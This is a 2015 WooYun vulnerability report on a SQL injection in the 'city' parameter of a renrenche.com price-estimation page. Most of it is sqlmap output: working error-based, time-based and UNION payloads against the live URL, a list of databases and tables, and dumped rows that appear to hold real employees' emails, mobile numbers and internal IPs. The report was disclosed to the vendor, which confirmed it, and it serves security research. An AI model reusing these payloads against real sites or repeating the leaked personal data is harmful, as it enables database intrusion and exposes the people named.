当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0139980

漏洞标题:人人车某站存在SQL注入漏洞

相关厂商:renrenche.com

漏洞作者: 星明月稀

提交时间:2015-09-09 16:26

修复时间:2015-10-24 17:20

公开时间:2015-10-24 17:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-09: 细节已通知厂商并且等待厂商处理中
2015-09-09: 厂商已经确认,细节仅向厂商公开
2015-09-19: 细节向核心白帽子及相关领域专家公开
2015-09-29: 细节向普通白帽子公开
2015-10-09: 细节向实习白帽子公开
2015-10-24: 细节向公众公开

简要描述:

人人车某站存在SQL注入漏洞

详细说明:

注入点:

http://pinggu.renrenche.com/index.php?m=get_model_price&model_id=4147&register_time=2015-05&mile=1&token=TYZKELbm&city=119


参数:city

error-sqli.png

漏洞证明:

sqlmap跑下:

Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: m=get_model_price&model_id=4147&register_time=2015-05&mile=1&token=TYZKELbm&city=119 OR (SELECT 4294 FROM(SELECT COUNT(*),CONCAT(0x71786a7671,(SELECT (ELT(4294=4294,1))),0x7178787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: m=get_model_price&model_id=4147&register_time=2015-05&mile=1&token=TYZKELbm&city=119 OR SLEEP(5)
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: m=get_model_price&model_id=4147&register_time=2015-05&mile=1&token=TYZKELbm&city=119 UNION ALL SELECT CONCAT(0x71786a7671,0x55466e6162684a635073,0x7178787071)-- 
---
[15:55:09] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.29
back-end DBMS: MySQL 5.0
[15:55:09] [INFO] fetching database names
[15:55:10] [INFO] the SQL query used returns 6 entries
[15:55:10] [INFO] retrieved: information_schema
[15:55:10] [INFO] retrieved: mysql
[15:55:10] [INFO] retrieved: performance_schema
[15:55:10] [INFO] retrieved: price_evaluate_online
[15:55:10] [INFO] retrieved: rrc
[15:55:11] [INFO] retrieved: rrc_friends
available databases [6]:                                                                                                           
[*] information_schema
[*] mysql
[*] performance_schema
[*] price_evaluate_online
[*] rrc
[*] rrc_friends


好像设计主站库,泄露用户信息

Database: rrc                                                                                                                      
[147 tables]
+----------------------------------+
| backup_cm_appointment_20150815   |
| backup_cm_appointment_bak150312  |
| backup_cm_category               |
| backup_cm_ip                     |
| backup_cm_motion                 |
| backup_cm_promo                  |
| backup_rc_auth_code_history      |
| backup_rc_ci_sessions            |
| backup_rc_login_attempts         |
| backup_rc_sale_notify            |
| backup_rc_search_filter          |
| backup_rc_search_filter_bak      |
| backup_rc_user_autologin         |
| backup_rc_user_profiles          |
| backup_rc_users                  |
| cm_58brand                       |
| cm_58chexi                       |
| cm_58chexing                     |
| cm_appointment                   |
| cm_brand                         |
| cm_brand_and_series_info_view    |
| cm_car_info_view                 |
| cm_car_model                     |
| cm_car_series                    |
| cm_intent                        |
| cm_sold                          |
| cp_aftersale_address             |


[16:05:53] [INFO] starting 5 threads
[16:05:55] [INFO] retrieved: "1"," ","0","\\\\u5927\\\\u8fde","0000-00-00 00:00:00","xuyonggui@renrenche.com","1024","100.97.137.72","2015-09-09 16:02:58","13604082047","20...
[16:05:55] [INFO] retrieved: "1"," ","0","\\\\u5168\\\\u56fd","0000-00-00 00:00:00","yangshaoxu@renrenche.com","1025","100.97.135.248","2015-09-09 08:06:32","13522382635","...
[16:05:55] [INFO] retrieved: "1"," ","0","\\\\u5408\\\\u80a5","0000-00-00 00:00:00","luhuan@renrenche.com","1026","","0000-00-00 00:00:00","13515606138","2015-08-14 15:51:2...
[16:05:55] [INFO] retrieved: "1"," ","0","\\\\u4f5b\\\\u5c71","0000-00-00 00:00:00","chenchien@renrenche.com","1027","","0000-00-00 00:00:00","18927279047","2015-08-14 18:0...
[16:05:55] [INFO] retrieved: "1"," ","0","\\\\u6df1\\\\u5733","0000-00-00 00:00:00","chenweidong@renrenche.com","1031","","0000-00-00 00:00:00","13927488838","2015-08-16 21...
[16:05:55] [INFO] retrieved: "1"," ","0","\\\\u90d1\\\\u5dde","0000-00-00 00:00:00","qianxiaohui@renrenche.com","1030","100.97.135.162","2015-09-09 10:07:56","15981804406",...
[16:05:56] [INFO] retrieved: "1"," ","0","\\\\u4e1c\\\\u839e","0000-00-00 00:00:00","yuanjiangnan@renrenche.com","1032","100.97.136.239","2015-09-09 10:58:34","18688842824


ctrl+c掉,没继续跑了。。。

修复方案:

过滤下下。

版权声明:转载请注明来源 星明月稀@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-09-09 17:18

厂商回复:

非常感谢!

最新状态:

暂无